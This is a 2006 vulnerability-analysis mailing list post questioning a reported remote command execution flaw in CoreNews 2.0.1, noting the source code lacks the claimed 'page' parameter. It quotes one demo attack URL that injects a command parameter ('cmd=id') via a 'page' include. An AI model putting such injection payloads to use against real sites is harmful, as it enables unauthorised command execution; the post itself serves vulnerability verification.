[VIM] Oddness - CoreNews 2.0.1 Remote Command Exucetion

Steven M. Christey coley at mitre.org
Mon Mar 13 19:24:04 EST 2006


Ref:

  BUGTRAQ:20060309 CoreNews 2.0.1 Remote Command Exucetion
  http://www.securityfocus.com/archive/1/archive/1/427387/100/0/threaded

The researcher says:

>http://www.example.com/index.php?page=evilcode?&cmd=id

It's not clear where this is a file include issue, eval injection,
etc.  The demo URL is not specific enough.

Also, I downloaded the source code for CoreNews 2.0.1 from this site:

  http://www.php-spezial.de/start.php?go=top&id=&s=3

Doing a grep for "page" on the entire distribution does not return any
matches, except for unrelated example "homepage" URLs.

This is interesting, since it appears that this product is used by
some sites, and the page parameter is present and functioning.

Could this be a site-specific issue that is unrelated to CoreNews?  Or
maybe there's a modified version that's also called "2.0.1" ?

Or maybe there's only so much you can see from a casual source
inspection :)

- Steve


More information about the VIM mailing list